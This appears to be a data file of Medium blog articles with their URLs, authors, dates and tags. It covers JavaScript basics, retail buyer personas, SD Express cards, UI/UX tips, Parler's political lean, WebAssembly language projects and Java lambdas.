We can prioritize operations with parentheses.
For instance, we can write:
(1 + 3) * 2
to prioritize addition over multiplication.
Without parentheses, multiplication would go first.
Subtraction is done with the - operator and division is done with the / operator.
When there’re no parentheses in an arithmetic expression, then the precedence of the operators is applied by the regular rules of math.
* and / have precedence over + an - .
% stands for the remainder operator.
1 % 2 means that we get the remainder of dividing 1 by 2.
Therefore, 1 % 2 returns 1.
Special Numbers
There are some special values in JavaScript rhat are considered numbers but they don’t act like normal numbers.
Infinity and -Infinity are represent positive and negative infinite values.
Infinity — 2 is still Infinity .
We shouldn’t trust these values too much.
NaN stands for ‘not a number’. However, it’s still of type number.
We’ll get this result when we try to calculate 0 / 0 , Infinity — Infinity or any numeric operations that don’t yield a meaningful result.
Strings
Strings are another basic data type. It’s used to represent text.
They’re written by enclosing quotes.
We can use single quotes, double quotes, or backticks to enclose a string.
As long as the starting and ending delimiter match, we can use any of them.
For example, we can write:
'hello world'
or:
"hello world"
or:
`hello world`
If the backslash character is found in the quoted text, then it’s used for escaping the character.
It won’t be displayed and it’s used to write special characters like newline or tabs.
For instance, we can write:
'hello
'
where
is the newline character.
Strings are also stored as a series of bits on a computer.
They’re encoded into the Unicode character set and then stored on the computer.
Unicode has almost every character we would ever need from any language like Greek, Japanese, numbers, in addition to English characters.
Strings can’t be divided, multiplied pr subtracted, but + can be used on strings for concatenation.
For instance, we can write:
'hello' + 'world'
Strings in double-quotes act the same as if they’re wrapped in single quotes.
Template literals can do a few more tricks. They’re the strings enclosed by backticks.
We can embed expressions into them. For example, we can write:
`half of 50 is ${50 / 2}`
Then we get:
`half of 50 is 25`
as the final result.
Unary Operators
Unary operators operate on one operand.
One of them is the typeof operator for checking the type of a value.
For instance, we can write:
typeof 10
to get 'number' and:
typeof 'y'
to get 'string'.
Photo by Merve Aydın on Unsplash
Binary Operators
Operators that take 2 operands are called binary operators. They’re the ones like the arithmetic operators.
Conclusion
Numbers and strings are the basic types of data. Large quantities of numbers can be stored.
We can work with them with various operators. They’re encoded with Unicode so that we can store lots of characters.
Unary operators take one operand.
JavaScript In Plain English
Enjoyed this article? If so, get more similar content by subscribing to our YouTube channel! | https://medium.com/javascript-in-plain-english/javascript-basics-simple-value-types-and-operators-341c205ba5f4 | ['John Au-Yeung'] | 2020-06-14 17:10:06.726000+00:00 | ['Technology', 'Software Development', 'JavaScript', 'Programming', 'Web Development'] |
175 | Buyer personas in retail | Back in the days, before the Internet, customer-retailer relationship was different. When a customer bought something, they had to bear significant risk if a product did not meet their expectations. Nowadays, the buying process has completely changed. Retailers have to invest in customer satisfaction. Customers have a lot of information and choice at their fingertips. They can browse through different suppliers, and can easily return products. It is important that retailers differentiate themselves from their competition and focus on their own strengths and unique selling points. Most importantly, they need to find smart ways to stay relevant and fulfil their customers’ needs.
Buyer Personas in retail
As retailer, you have to offer the right product to the right person, both online and offline, to create and maintain traction. For every marketing strategy, it is crucial to know what your target group is, as well as what drives and motivates them. It is important to understand how they make a decision to purchase. To better understand this, you can create Buyer Personas. Buyer personas can help you understand customers according to their emotions and behaviour.
What is a buyer persona?
A buyer persona is a semi-fictional representation of your target group, which allows you to put a face to data. A buyer persona does not represent your ideal customer, it represents the corresponding purchase behaviour of your customers. Every company has their own unique persona or multiple personas. A company usually creates around 2 or 3 primary buyer personas, based on their target groups, with each persona representing one target group.
The strongest personas are based on data, market research and your own insights. You should conduct desk research, research statistics of the communication channels, hold surveys, and interview your target group. You can also create secondary personas, which are focused on the characteristics of a particular branch or market segment. The behavior and the goals of those secondary personas are the same as of the primary personas.
How to create a Buyer Persona for your retail
To set up a good profile for your buyer persona, you should research the following components:
Characteristics: to understand your customer throughout
Scenarios: to understand the how and why of their buying decision
Gaps: to understand where they are now and where they want to go
Bridge: to understand what they need to bridge this gab
Goal: to understand what the customer wants to achieve
The right marketing content
Buyer personas should inspire you to produce relevant marketing content that appeals to your target group. Communication between you and your customers will be enriched by using the information of a buyer persona, because it allows you to accurately align your message with your target group. It is key to develop different buyer persona- specific content to approach your target group in an effective way.
Allocate marketing budget efficiently
Buyer personas can help you to optimize your online marketing budget. When you understand your customers’ behavior, which tells you how your customers obtain information and which goals and motives they have, you can target your customers at the right time, with the right product. This results in an increase of online traffic and repeated purchases. Besides, a buyer persona help you make better decisions when it comes to promoting content and choosing appropriate marketing channels (Facebook, LinkedIn, Instagram etc).
In conclusion, buyer personas can help you understand your customers better. Buyer personas enable you to match your marketing content to your target group, which makes your marketing content more relevant to your (potential) customers. In addition, it can help you approach your customers through the right channels with the right content.
Other related articles
PREVIOUS STORY
← Brand consistency for franchising
NEXT STORY
14 most beautiful Brand Books/Style Guides → | https://medium.com/marketing-and-branding/buyer-personas-in-retail-619e8affa782 | ['Raul Tiru'] | 2020-12-21 12:10:00.398000+00:00 | ['Retail Marketing', 'Retail Technology', 'Buyer Personas', 'Retail', 'Retail Industry'] |
176 | The New SD Express Card Explained: Everything You Need to Know | After a period of two years, the SD Association — a consortium that sets memory card standards — announced specifications for the new SD Express card in its 8th release. The headline feature of the SD Express card is its ability to transfer data at 4GBps which is really amazing. Apart from that, dual lanes have been incorporated in the SD Express card to deliver gigabyte speed. So if you are curious as to how the Association managed to increase the transfer speed by four folds then you have come to the right place. In this article, we take a detailed look at its version history, technical aspects, architecture design, and more. Further, I have discussed what this new memory card can bring to general consumers in the end. So without wasting any time, let’s go through the article. 1. The Basics If you are unfamiliar with the various standards of SD cards then let’s brush up the basics first. SD cards have multiple bus interfaces. By bus interface, I mean the design of the connectors that establish a connection with the peripheral device. The names of the bus interfaces are based on their speed capability. For instance, the first bus interface was literally called “Default Speed” which could read and write at 12.5 MB/s. The next release was called “High Speed” which peaked at 25 MB/s. After that, UHS (Ultra High Speed) became the standardized bus interface for several years following the release of UHS-I, II, and III. The latest UHS-III supports transfer speed up to 624 MB/s. Source: WikipediaIn 2018, the SD Association overhauled its bus interface and brought a new standard called “Express”. On SD Express cards, the transfer speed could go up to 985 MB/s (around 1GBps), but that was not its standout feature. For the first time, the SD Association used the PCIe interface and NVMe protocol to create a new bus interface for its SD card. By the way, PCIe and NVMe are used in SSDs and we know how fast they can be (up to 5GBps). So with the release of the first SD Express card in 2018, it marked a new chapter in SD Association’s history. Fast forward to present, and now the Association has announced that their new SD Express card can go up to 4GBps (3938 MB/s, to be specific), again thanks to improved PCIe interface and NVMe protocol. The New SD Express CardSo to sum up, SD cards have finally entered into the Gigabit race and it would be interesting to see how it changes the market dynamic for consumer device makers. But before that, let’s go ahead and study how the new SD Express card leveraged the PCIe and NVMe technologies to nearly quadruple the transfer speed from its last-gen bus interface. 2. PCIe Interface and NVMe Protocol During the first SD Express card release, the consortium had implemented the older PCIe 3.1 interface and NVMe 1.3 protocol. But now, they are using the well-known PCIe 4.0 interface and the latest NVMe 1.5 protocol. Sure, PCIe 4.0 interface is not the latest one, but it’s one of the most widely-adopted bus interfaces by electronic makers. Apart from that, PCIe 4.0 maintains backward compatibility and interoperability with all the older PCIe generations so that is great. Apart from that, another reason why the new SD Express card has seen such a massive uptick in transfer speed is because of its dual-lane architecture. I have discussed the architecture of SD Express Card in detail below so let’s go through that. 3. The Architecture of the New SD Express Card Before we dive deep into its architecture, keep in mind, the SD Association has not announced a microSD card with the PCIe 4.0 + NVMe tech. For now, it’s only limited to the full-sized SD memory card. With that out of the way, let’s move to the architecture. The new SD Express card has three configurations:
A single-lane PCIe 4.0 interface which can go up to 2GBps (4.0 x 1)
A dual-lane PCIe 3.1 interface which can go up to 2GBps (3.1 x 2)
A dual-lane PCIe 4.0 interface which can go up to 4GBps (4.0 x 2)
In Figure 3 below, you can see that it uses the same pins and connectors from the older UHS-II interface. However, the differential interface is based on PCIe 4.0 and features a single lane. As mentioned above, it can go up to 2GBps. Moving to Figure 4 and this is where things get interesting. As you can see, there is an additional third row of pins to support two PCIe lanes. It can be used for implementing both PCIe 3.1 and 4.0 interfaces. Apart from that, for dual-lane cards, an additional pin 19 has been added for providing more power (3.3V). Moreover, Pin 18 has been reserved for optional 1.2V supply planned for future use. The best part about the new SD Express card architecture is that the first row is based on the UHS-I interface. It means that, despite being a modern and extremely fast memory card, SD Express will still be backward compatible with billions of existing SD host devices. You will be able to plug the SD Express card and use it on older laptops and card readers without having to buy a compatible SD card reader. However, keep in mind, you won’t get the touted Gigabit transfer speed. 4. What Does It Mean to General Consumers? The new SD Express card is a big leap in the removable storage segment. It can be a game-changer for creative professionals who shoot high-resolution content such as super-slow-motion video, RAW continuous burst mode photography, 8K video, 360-degree video, and more. In fact, the SD Association has said that “this new protocol allows SD Express memory cards to serve as removable Solid State Drives (SSD)“. From the technical point of view, the SD Express card has really become an SSD at this point. However, we will have to wait and see how the consumer device makers react to this new development. The Association has also pinned its hope on Android device makers indicating that SD Express cards can now be used as embedded memory in place of eMMC or UFS storage. However, the big issue with SD cards, in general, is that they consume too much power in comparison to UFS or eMMC. Traditionally, SD cards need 3.3V to initialize the card and 1.8V to perform operations. In contrast, UFS needs 0.2V to 0.4V to initialize and perform operations. On top of that, the new SD Express card comes with additional pins for power supply so it’s unlikely that SD cards are going to replace eMMC or UFS in smartphones. Having said that, it would be awesome, if laptops would bring back the SD card slot — not just for plugging removable memory card, but to extend the storage. It would be the best solution and reduce the hassle of replacing the SSD by opening the innards of a laptop. Moreover, the new SD Express card supports storage up to 128TB (theoretical, I know!) so you would get ample capacity in a small footprint with stellar read-write speed. To sum up, the new SD Express card can be a great replacement for PCIe-NVMe SSDs. Now coming to the crucial question — when can you get your hands on the ultra-fast memory card? Well, it could take more than a year for memory card makers to implement the latest specifications, so late 2021 would be a safe bet. However, since there are so many versions and standards of memory cards, it can be confusing for a user to pick the right SD Express card. The SD Association has released the trademark for the SD Express card and it would appear similar to the above image on the memory card. As it supports all three SD card families, you can pick anyone from SDHC, SDXC, SDUC. SDHC cards are available under 32GB and will have transfer speed around 2GBps. Next, SDXC cards can have storage up to 2TB and can go up to 2GBps. Finally, SDUC cards will offer you maximum storage of up to 128TB and transfer speed of up to 4GBps. Keep in mind, all these numbers are theoretical so the transfer speed can significantly change depending on the host device. You can find transfer speeds for various card-host combinations from the below image. Learn About the New SD Express Card So that was all about the SD Express card. We have discussed a bit of history, its technical aspects, architecture, and some pointers for general users to pick the right memory card. The card is broadly targeted at creative and professional users, but I think it would be a great solution for people who want to extend the storage on their computers in a hassle-free manner. Anyway, that is all from us. If you want to learn more about this subject then you can go through the whitepaper published by the SD Association. And if you found the article informative then you can comment down below and let us know.
The Blog Credit Goes To Bb | https://medium.com/@cr0tk/the-new-sd-express-card-explained-everything-you-need-to-know-6075d22751b4 | ['Divyansh Singh'] | 2020-12-02 05:20:43.877000+00:00 | ['Sd Card', 'Mac', 'Tech', 'Technology', 'Windows'] |
177 | I found the Best Raspberry Pi course that helps you in 2021 | Raspberry Pi course for Beginners.
Raspberry Pi is the name of a series of single-board computers made by Raspberry Pi Foundation, a UK charity that aims to educate people in computing and create easier access to computing education
All over the world, people use Raspberry Pis to learn programming skills, build hardware projects, do home automation, and even use them in industrial applications so we help u to learn and use the Raspberry Pi computer.
Why u learn the Raspberry Pi course?
that you will use to design and develop fun and practical IoT devices while learning programming and computer hardware. In addition, you will learn how to set up up the Raspberry Pi environment, get a (Mac+PC) system running, and write and execute some basic Python code on the Raspberry Pi. for the Raspberry Pi, and how to trace and debug Python code on the device.
TAP HERE TO KNOW MORE ….. | https://medium.com/@jyotrymayanandasahu/i-found-the-best-raspberry-pi-course-that-helps-you-in-2021-63b3eb5aff22 | [] | 2020-12-27 14:00:23.129000+00:00 | ['2021 Trends', 'Computers', 'Technology', 'Raspberry Pi', '2021'] |
178 | Top UI UX Design Inspiration 135 | 9 tips from TheyMakeDesign editors
1. Use role-play
A bit of role-play can create the space for inspiration. Take a step away from your projects, and pretend you are a user. Think about what would make you excited and pleased to use a website or an application. Think about the frustrations you have experienced. Think about what appeals and why others are skeptical or afraid. Think about the memes you have seen that relate to a potential design. Once you have teased the ideas out, you can look at them. See if some ideas from different perspectives add more value. You can either take one idea and do more research on it or come up with a few different ideas to take to your next meeting.
2. Look at the bigger picture
Let’s say you are designing an add-on for an existing product. It is a small application that functions in one place. You are designing an additional button on the sidebar called “extended features” that will add a sub-menu to that page. You are thinking about the UX for this button, but you know a few times that it will get buried beneath other links and menus. Wanting to get focus on this feature, you meet with the product owner who is excited about the extended features button you are designing. It gets buried in menus.
3. Embrace the uncertainty
Being uncertain is the natural state of design. Tony Faulds (design guru) has a great way of defining this.
Our job as UX designers is to embrace uncertainty, much as the river embraces the landscape. We should always know where we are heading and the purpose of the journey, but we should maintain flexibility.
Even though you have a plan for your project, you are going to have to let go at a few points, like when there is disagreement or when you are in the middle of something that doesn’t quite fit. If you can get your mindset working towards uncertainty, you will be able to have greater impact in your designs.
4. User and stakeholder interviews
If you feel stuck in your design process, a discussion with potential users and stakeholders can provide valuable insights and direction. Take the time to ask the appropriate questions and you will be better able to understand the vision for the project and the goals and expectations for new features. As a result, the points in the next tip will be clearer and more useful.
5. Have a concept to develop from the beginning
When you’re ready to develop some designs, take a few extra moments to help define the vision, goals and expectations for the project . As a result of doing this, the points in #4 will be clearer and more useful.
6. Think about the users
Users drive the design process. As Edward De Bono says, you need to “think about the person who will be using this. . . and design a solution from their point of view.”
7. Consider the purpose of the site or application
The first step in designing is to think about what the finished product will look and feel like. As an example, think about your favorite site or application and then ask yourself what you got out of your last visit. (diagonally measure your project scope with user’s actions)
8. Know the constraints
There are some constraints your design process can experience. The technology you are working with, designers available, and the scope the rest of the stakeholders have all affect the design. Before you start designing, ask these 3 questions “What constraints are we working with?” “What are we not constrained by?” “What could we add to the process that would be beneficial?”
9. Define your approach
When you are ready to take an approach to designing you want to do, think about the core assumptions you want to make.
Conclusion thoughts
Sometimes, it’s good to take a step back to clarify the thoughts in our head.
I hope these 9 tips help you develop a better process for designing. If you have any tips of your own that you would like to share I would love to hear from you! Please email them to me at [email protected]. | https://uxplanet.org/top-ui-ux-design-inspiration-135-eedca154088a | ['They Make Design'] | 2020-12-22 07:41:48.731000+00:00 | ['Visual Design', 'Design', 'Inspiration', 'Technology', 'Art'] |
179 | Is Parler Right Biased? | Is Parler Right Biased?
First, I’m going to disclose that I’m pretty biased here. I’m a former Facebook engineer (2 years on main FB News Feed iOS product) and I’ve been a software engineer for over a decade. I live in Silicon Valley and voted for Joe Biden.
That being said, I try to look at ground truth, and while I use Facebook, and vote Democrat — I have major public complaints and feedback about each, I think it is healthy to recognize what you prefer as well as what is going on. I do love to download any new mobile iOS app to see what they are about and to grab my user name while the product is still in beta whenever possible. So when I saw that some of my Republican family and friends were asking on Facebook for us to “switch” to Parler, a website and mobile App that, in it’s own meta:description (Google Summary) tag claims:
Parler is an unbiased social media focused on real user experiences and engagement. Free expression without violence and no censorship. Parler never shares your personal data.”
Then I thought, better grab my user name, and downloaded and installed the app. The very first screen?
Oooh, is this for picking my complementary hat?
Ignoring that adding a feature to theme your social media app before you have copy and paste is just bad development and sets the general quality bar for the product itself fairly low (we aren’t here for that) and while I may think having a default color theme choice be red is tacky, it’s just a subliminal sign of the super-liminal hints that come when it’s time to “Personalize your Parler Experience”:
*Assuming your person is a MAGA republican
In case you can’t tell what these individuals have in common. It’s Donald Trump. 2 of them are sitting US politicians, and the rest are pundits. All are vocal Trump cultists. If you choose to “Skip” adding Hannity as one of your friends, you are taken to a second screen asking you again to “Personalize your Parler Experience”:
Look Familiar
Again, ignoring how confusing it is to have two identical steps (Kinda looks like the second one is their equivalent of “Pages” vs “Individuals”, though the distinction is unclear), and that they already suggested I follow Hannity, all of the suggests are pro-trump far right groups. The only question mark I had was “Transparency 2020” which is unrelated to any real organization that I could find, only reposts things claiming the 2020 election was rigged, and “transparently” describes itself only as “Unfiltered Content”.
So every page suggested during the setup process is Pro-Trump, and Far Right. If this is a mere coincidence of circumstance, it doesn’t start off on a good foot, and as a software developer, it occurred to me that the answers to the first 3 questions on this screen could very easily be used as a purity test, to spot and assist in banning users (We can get to that later). So far not seeing a lot of the “unbiased” claimed in the tagline. But let’s give it a shot. When you first join, you automatically make your first post:
Putting words in your mouth is the opposite of censorship!
Seconds after my “Hello Parler” Post, I had my first user interaction!
Wait, THE Ron Paul
Not sure if these automatic posts are a part of the Parler system, or just taking advantage of the fact that it currently has a really bad bot problem. In case you are thinking that an auto welcome post from Ron Paul means there is a non-Trumper on the system, he changed his position on Trump a while ago. Batting 100 still. So yes, while all the content and content producers so far seem to be MAGA Trumpers and Right wing “news” outlets, that doesn’t mean that the platform is biased. Just everything on it, right? The answer there comes when you go to the other tabs available in the App: “Discover” news, and search. For the Discover news tab, there are two feeds, “Partners” and “Affiliates”. I scrolled and checked bias for a while, but all of the content featured partners and affiliates were right leaning. As for the content (Which I could only find through their search hashtags function, a limited and kind of broken way to see “Trending Content” I suppose), was all either extreme right posts, or “sexy time” spam bots targeting evangelicals.
Alllllright. Sexy Time. Real Lady. High five.
So, the lions share of the current contributors, affiliates, partners and non-spam content are Right Wing.
Does that make the Platform Right Biased? For all practical purposes it does.
The CEO has acknowledged their membership problem, and has claimed to put up a 20k bounty for “an openly liberal pundit with 50,000 followers on Twitter or Facebook to start a Parler account.”, they had it at 10k but had to raise it up when nobody took the bait.
So maybe, the day will come when the wash of 2020 Trump mourners looking for a news feed that kept feeding them the reality they want to believe without all those pesky fact checkers, subsides. And maybe a few brave liberal influencers will come to the platform seeking to stand against the red hordes. And maybe a slow trickle of left leaning regular users and lurkers will come to follow that content rather than where those contributors normally post. And just maybe then everyone else will come in, and the content and contributors will find the same natural balance that Facebook and Twitter has in terms of left and right voices.
But personally I don’t think there will ever be anything close to the user and content base parity found on other sites, and If I’ve learned anything about what makes a social media site successful it’s having as many people on it as possible. And whether intentionally or sheer coincidence Parler has gotten off to a really bad start alienating half of its potential user base. Nobody is going to want to go somewhere to get bullied. Better to burn the brand and try again, with a rallying cry that is less one sided, or just admit to being a right biased safe space. | https://medium.com/swlh/is-parler-right-biased-ccf3c16ce0ca | [] | 2020-11-13 21:55:22.665000+00:00 | ['Parler', 'Politics', 'Bias', 'Social Media', 'Technology'] |
180 | Developing Expertise | 1. Principles
To begin, develop a wide and thorough vocabulary. This enables a person to understand the core elements in a field, but more importantly: communicate with people about the field. This vocabulary in our memory helps us recognize elements at a fundamental level and later conceptually map how these elements relate to one another. These fundamental truths about a field are called principles.
This way of thinking is known as First Principles, which Aristotle said: | https://medium.com/compound-community/developing-expertise-5c36897e4963 | ['Joshua Hoering'] | 2020-12-24 05:29:39.365000+00:00 | ['Consulting', 'Learning', 'Innovation', 'Business', 'Technology'] |
181 | 12 hot language projects riding WebAssembly | Image Credit: Bamyx Technologies
Today’s web applications aren’t even close to being as quick and responsive as native desktop apps, but what if they could be? WebAssembly makes this commitment.
WebAssembly is a low-level assembly-like language with a small binary structure that operates in web browsers at near-native speeds. At the same time, WebAssembly provides a portable compilation target for programming languages like as C/C++, C#, Rust, Go, Kotlin, Swift, and others.
WebAssembly is supported by Google, Mozilla, Apple, and Microsoft in their browser engines, and is hailed as a means to increase online application speed while also allowing languages other than JavaScript to be utilized in the development of browser programs.
WebAssembly has spawned a slew of new technologies, including even new programming languages, that make use of its capabilities. The following are 12 language initiatives that have staked a significant amount of money on WebAssembly.
Binaryen
Binaryen is a WebAssembly compiler toolchain infrastructure library. Binaryen is a C++ library that makes compiling to WebAssembly simple, effective, and quick. WebAssembly is supported by Google, Mozilla, Apple, and Microsoft in their browser engines, and is hailed as a means to increase online application speed while also allowing languages other than JavaScript to be utilized in the development of browser programs.
WebAssembly has spawned a slew of new technologies, including even new programming languages, that make use of its capabilities. The following are 12 language initiatives that have staked a significant amount of money on WebAssembly.
Binaryen is a WebAssembly compiler toolchain infrastructure library. Binaryen is a C++ library that makes compiling to WebAssembly simple, effective, and quick.
Blazor WebAssembly
Blazor WebAssembly is a framework for creating interactive, client-side, single-page web apps in.NET and hosting them in modern browsers (including mobile browsers) using the WebAssembly runtime. There are no plug-ins or code recompilation into other languages necessary. The runtime allows.NET code to use WebAssembly’s JavaScript APIs to access browser functionality.
When a Blazor WebAssembly program is executed in the browser, C# code and Razor files are compiled into.NET assemblies, which are downloaded along with the.NET runtime to the browser. The.NET code is further protected against malicious operations on the client system since it is run in WebAssembly in the browser’s JavaScript sandbox. Blazor WebAssembly apps can be run on their own or with server-side assistance.
Cheerp
Cheerp is a web-based enterprise-grade C/C++ compiler from Leaning Technologies that compiles C and C++ up to C++ 17 into WebAssembly, JavaScript, or a combination of the two. Cheerp is built on top of the LLVM/Clang framework, with specific optimizations aimed at improving efficiency and reducing the size of the compiled output. Cheerp is mostly used to convert existing C/C++ libraries and applications to HTML5, but it may also be used to create web apps and WebAssembly components. Cheerp is available in both open source and commercial versions.
Cheerp is available for download at leaningtech.com.
CherpJ
This LLVM-based compiler, dubbed “the Java compiler for the web,” turns any Java client program into WebAssembly, JavaScript, and HTML, allowing them to operate in modern browsers. To access the DOM from Java, CheerpJ uses three components: an AOT (ahead-of-time) compiler, a runtime in WebAssembly and JavaScript, and JavaScript DOM interoperability APIs. The AOT compiler can be used to compile JAR archives with CheerpJ. CheerpJ does not necessitate any server-side assistance.
CheerpJ, like Cheerp, is a product of Leaning Technologies. It’s available for download at leaningtech.com.
Emscripten
This open source compiler toolchain converts C and C++, as well as any other language that uses LLVM compiler technology, to WebAssembly for web deployment, Node.js, or a Wasm runtime like Wasmer. (The Emscripten compiler, emcc, also produces JavaScript, which gives the built programs API support.)
Emscripten was used to convert a number of real-world codebases to WebAssembly, including commercial codebases like the Unreal Engine 4 game engine and the Unity 3D platform. C and C++ standard libraries, C++ exceptions, and OpenGL/WebGL graphics commands are all supported by Emscripten. The Emscripten SDK may be used on Linux, MacOS, and Windows to install the Emscripten toolchain (emcc, LLVM, and so on).
Forest
Forest is a WebAssembly-compiling functional programming language. Forest’s purpose, according to developer Nick Johnstone, is to provide a language that makes it easier to create big, interactive, and functioning online programs without the conventional overhead of that approach.
Forest has static typing, pattern matching, immutable data structures, numerous syntaxes, and automatic code formatting, and is currently defined as “pre-alpha, experimental, conceptual research software.” Elm and Haskell inspired the first syntax in development.
The Forest language’s design principles include ease of cooperation, as painless testing as possible, and agreement on structure and semantics while agreeing to differ on syntax. Forest is designed to be quick enough for constructing sophisticated games while also being “blazing fast” for conventional web apps, according to Johnstone.
Forest is available for download on GitHub.
Grain
The Grain language combines aspects from academic and functional languages to create a language for the twenty-first century, the project website states. Grain can run in the browser, on the server, and potentially anywhere because it is compiled to WebAssembly using the Binaryen toolchain and compiler infrastructure. There are no runtime type errors, and no type annotations are required. The Grain toolchain is a single binary that includes a CLI, compiler, runtime, and standard library. To build Grain from source, developers will need Node.js and Yarn, and binaries are available for Linux, MacOS, and Windows.
You can find instructions for getting started with Grain at grain-lang.org.
JWebAssembly
JWebAssembly is a Java bytecode to WebAssembly compiler by I-Net Software that accepts Java class files as input and outputs WebAssembly binary format (.wasm file) or text format (.wat file).
The goal is to use WebAssembly to run natively in the browser. JWebAssembly can theoretically compile any language that compiles to Java bytecode, including Clojure, Groovy, JRuby, Kotlin, and Scala.
JWebAssembly is not yet ready for production use. Although all of the requirements for the JWebAssembly 1.0 release have been met, testing still has to be completed. A Java bytecode parser, a test framework, and a Gradle plug-in are all in the plan for version 1.0. JWebAssembly 1.0 is expected to be released this year by I-Net Software.
JWebAssembly is available for download on GitHub.
Pyodide
Pyodide compiles Python and the Python scientific stack to WebAssembly, bringing the Python 3.8 runtime, NumPy, SciPy, Matplotlib, Scikit-learn, and dozens of other packages to the browser, which was just spun out from Mozilla. Pyodide allows Python to access web APIs and provides transparent object conversion between JavaScript and Python. Pyodide was launched in 2018 as part of the Iodide data science in a browser effort. Pyodide can be tested using a browser-based REPL.
Instructions for obtaining and using Pyodide can be found at pyodide.org.
TeaVM
TeaVM is a Java bytecode compiler that generates WebAssembly and JavaScript to operate on the web to run in the browser. It should be noted, however, that WebAssembly functionality is currently in beta. TeaVM, like its cousin GWT (Google Web Toolkit), allows programmers to design Java applications and deploy them as JavaScript. TeaVM, unlike GWT, operates with compiled class files rather than source code. TeaVM also uses existing compilers like javac, kotlinc, and scalac to build Kotlin and Scala code in addition to Java. TeaVM is primarily a web development tool; it is not intended for converting big Java or Kotlin codebases to JavaScript. Flavour, a TeaVM subproject, is a framework for creating single-page web apps.
On GitHub, you’ll find instructions for downloading and using TeaVM.
Uno Platform
Uno Platform is a UI platform for.NET teams to build single-codebase applications for WebAssembly, the web, Windows, MacOS, Linux, iOS, and Android using C# and XAML, as an alternative to the Xamarin mobile app platform. Uno uses the.NET 5 Mono-WASM runtime to run C# code in all major web browsers, and it also acts as a bridge for WinUI and UWP (Universal Windows Platform) apps to run natively on WebAssembly. Developers can use Visual Studio or Visual Studio Code to create web apps with Uno.
The Uno Platform website has instructions for getting started.
Wasmcloud
Wasmcloud is a Cosmonic application runtime that uses WebAssembly to create composable, portable apps that can be used in multi-cloud, edge, and browser environments. Security is handled by a WebAssembly sandbox, and an actor model separates business logic from specific underlying capabilities, according to the company. Developers can create microservices once in their preferred language and then deploy them anywhere. Rust, TinyGo, and AssemblyScript are among the languages currently supported. Wasmcloud has been accepted as a Sandbox project by the Cloud Native Computing Foundation (CNCF).
wasmCloud installation instructions can be found at wasmcloud.dev.
Don’t forget to give us your LIKES today | https://medium.com/@bamyxtechnology/12-hot-language-projects-riding-webassembly-c3969f06cca3 | ['Bamyx Technologies'] | 2021-08-27 18:00:56.621000+00:00 | ['Technology News', 'Language', 'Coding', 'Programming', 'Language Learning'] |
182 | Legible Lambdas | Photo by Math on Unsplash
We all love lambdas, don’t we? Lambdas are powerful (passing methods around, getting rid of anonymous classes…you get the picture) and with great power comes great responsibility. When we switched to using Java 8 at work, I was excited about finally getting to use lambdas! But very quickly, I found myself cramming all my code into a lambda. I was not only trying to overuse it, I was also writing code that was very unreadable.
Over the course of the past couple of years, I have gathered some “wows” and “gotchas” with using lambdas, that I have run into AND more importantly, run away from (all examples pertain mainly to Java):
Using Consumers, Functions, and Suppliers
Consumers are like methods with a void return type and one input argument. Functions are processing methods that take an element of type A and produce an element of type B (A and B could also be the same type).
Suppliers are comparable to methods that take no input arguments but always produce an output. It took me a while to get a hang of these nuances. Understanding these differences helps a bunch when you have to refactor some code using one of these interfaces.
For example, consider the following snippet of code:
someList.stream().map(listItem -> {
Step 1;
return result of Step 1;
}).map(step1Item -> {
Step 2;
return result of Step 2;
}) someOtherList.stream().map(listItem -> {
Step 1;
return result of Step 1;
}).map(step1Item -> {
Step 3;
return result of Step 3;
})
In order to be able to reuse applying Step 1 to listItems, we could extract the input to the first map method into a Function interface and with that change, the code would now look as follows:
someList.stream().map(applyStep1())
.map(step1Item -> {
Step 2;
return result of Step 2;
}) someOtherList.stream().map(applyStep1())
.map(step1Item -> {
Step 3;
return result of Step 3;
}) Function<a> applyStep1() {
return A -> {
Step 1;
return result of Step 1;
};
}
An easy way to do this: Let your IDE help you with extracting inputs to maps into Functions (select the entire block of code inside the map -> Right click and refactor -> Extract -> Method -> name the Function and TADA). This can also be done for other interfaces like Consumers and Suppliers !
Reusing reduction methods
Want to get the sum of all the items in a list? The average? Look no further, the streams API has a method for both!
integerList.stream().mapToInt(Integer::intValue).sum()
integerList.stream().mapToInt(Integer::intValue).average()
The point I am trying to make here is, there are reduction methods that may be provided out of the box and it is a good idea to always look before venturing out to write your own :)
Everything does not have to use the streams/parallel streams API
The streams API was one of the most widely celebrated features of java 8 and rightly so. It plays very well with lambdas and as someone new to this, I was subconsciously converting ALL my collections to streams irrespective of whether or not it was required.
Similarly streams vs parallel streams. The parallel is good right? Yes. Is it good ALL the time? ABSOLUTELY NOT. The internet is full of articles and performance benchmarks on these topics and I would highly recommend doing your research before streaming through EVERYTHING in your code base.
Break up the giant lambdas!
We are required to apply forty four steps to our input and we decide to use a map. But are we required to apply all the forty four steps in a single map method? Well lets see. So if we were to use only one map method, this is what our code would look like:
someList.stream().map(listItem -> {
Step 1;
Step 2;
Step 3;
Step 4;
.
.
.
Step 44;
return result of all above Steps;
});
Next consider this:
someList.stream().map(listItem -> {
Step 1;
return result of Step 1;
}).map(step1Item -> {
Step 2;
return result of Step 2;
}).map(step2Item -> {
Step 3;
return result of Step 3;
}).map(step3Item -> {
Step 4;
return result of Step 4;
});
.
.
.
I believe one of the biggest advantages of using lambdas is how elegantly you can break up processing steps into their own map method (there are other methods one could use and I am just citing map as an example here). I always like to break up big map methods into individual ones that are more readable and maintainable (this also allows for reusability).
At the same time, I would recommend against blindly having only one line of execution within every map method. We could always combine processing steps into a map as seen fit (For example, Steps 1–3 could be inside a single map).
map() with an if loop vs a filter
You can filter items in a collection using filter(). How long was it before I moved ifs inside my maps to actually be filter predicates? Long enough. What I am saying is this:
someList.stream().map(listItem -> {
if(listItem.startsWith("A") {
//Do Something
}
});
Can be instead written as this:
someList.stream()
.filter(listItem -> listItem.startsWith("A"))
.map(listItem -> {
//Do Something
});
Though this may or may not necessarily provide a performance bump, it adds to readability and ensures the use of appropriate methods.
Switching to using lambdas was a big jump for me that took a long time to get used to and it continues to surprise, frustrate, and wow me ALL at the same time! | https://medium.com/javarevisited/legible-lambdas-4259c831918e | ['Janani Subbiah'] | 2020-11-22 09:58:37.316000+00:00 | ['Technology', 'Programming', 'Software Development', 'Java', 'Coding'] |
183 | Hackers stole 14% of the total volume of Bitcoins and “Ethereum” | Hackers stole 14% of the total volume of Bitcoins and “Ethereum”
For all history of cryptocurrencies hackers could steal bitcoins and tokens of Ethereum for the sum of $1,2 billion, or about 14% of all stocks existing today. Autonomous Research reported about it.
Do you want be the first to read news of blockchain and crypto industries?Subscribe to our newsletter & join our Telegram channel.
